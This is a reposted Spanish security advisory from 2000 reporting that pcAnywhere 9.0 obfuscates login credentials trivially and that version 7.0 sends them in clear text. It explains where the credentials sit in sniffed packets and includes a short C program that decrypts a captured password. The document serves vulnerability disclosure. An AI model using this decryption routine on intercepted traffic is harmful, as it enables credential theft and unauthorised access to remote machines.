Member of The Internet Defense League Últimos cambios
Últimos Cambios
Blog personal: El hilo del laberinto Geocaching

El cifrado de pcAnywhere es inseguro

Última Actualización: 4 de Mayo de 2.000 - Jueves

Artículo publicado en el boletín Una-Al-Día de Hispasec, el 19 de Abril de 2.000.

La última versión de pcAnyware 9.0 cifra los nombres de usuarios y contraseñas de forma trivial, por lo que cualquier atacante con acceso a las redes externas puede capturar esa información y utilizarla para acceder a las máquinas remotas.

pcAnyware es un software para uso y administración remota de máquinas MS Windows, por lo que este problema es especialmente importante, ya que las máquinas remotas suelen encontrarse en redes hostiles.

Se desconoce si la versión 8.0 de pcAnyware es vulnerable también, aunque se considera extremadamente probable. La versión 7.0 envía los nombres de usuario y contraseñas directamente en texto claro, a disposición de cualquier atacante con un sniffer.

El nombre de usuario y la contraseña están contenidas en una cadena dos paquetes después de "Enter your login name" y "enter your password". Están precedidas por el byte 0x06, y el siguiente número es la longitud de la misma.

A continuación se incluye un programa en C que puede utilizarse para descifrar una clave capturada con cualquier sniffer.

>>>>>

#include <stdio.h>
#include <string.h>

void main() {

  char password[128];
  char cleartext[128];
  int i;

  // input the sniffed hex values here
  // Encrypted example of the 'aaaaa' password
  password[0]=0xca;
  password[1]=0xab;
  password[2]=0xcb;
  password[3]=0xa8;
  password[4]=0xca;
  password[5]='\0';

  cleartext[0]=0xca-password[0]+0x61;
  for (i=1;i<strlen(password);i++) 
    cleartext[i] = password[i-1] ^ password[i] ^ i-1;

  cleartext[strlen(password)]='\0';

  printf("password is %s \n",cleartext);

}

<<<<<

Más información:



Python Zope ©2000 jcea@jcea.es

Más información sobre los OpenBadges

Donación BitCoin: 19niBN42ac2pqDQFx6GJZxry2JQSFvwAfS